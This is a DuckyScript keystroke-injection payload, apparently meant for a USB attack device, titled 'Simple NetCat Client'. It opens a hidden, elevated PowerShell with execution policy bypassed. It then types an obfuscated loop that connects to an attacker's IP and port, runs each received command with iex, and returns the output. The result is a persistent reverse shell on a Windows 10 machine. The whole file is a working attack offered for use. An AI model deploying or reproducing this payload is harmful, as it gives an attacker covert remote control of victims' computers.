REM Title: Simple NetCat Client
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Uses Powershell to start a Netcat client that stays open until the system is restarted.
REM Target: Windows 10

REM *REQUIREMENTS*
REM start a netcat listener on server machine using port 4444 (example command for netcat > nc.exe -lvp 4444).

REM *SETUP*
NETCAT FOR WINDOWS - https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip
REM replace YOUR_IP_OR_DOMAIN_HERE with ncat server address and PORT_NUMBER.

REM some setup for dukie script.
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
CTRL-SHIFT ENTER
DELAY 1500
ALT y
DELAY 5000

REM write out the main Powershell code.
STRING do{;$v = 4;$a = New-Object SyStem.NeT.sockeTs.TCPClieNt("YOUR_IP_OR_DOMAIN_HERE",PORT_NUMBER)
STRING ;$b = $a.GetStream();[byte[]]$c = 0..65535|%{0};while(($d = $b.Read($c, 0, $c.Length)) -ne 0){;$e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d)
STRING ;$f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> ';$h = ([text.encoding]::ASCII).GetBytes($g);$b.Write($h,0,$h.Length);$b.Flush()};$a.Close();Sleep 10}while ($v -le 5)
ENTER
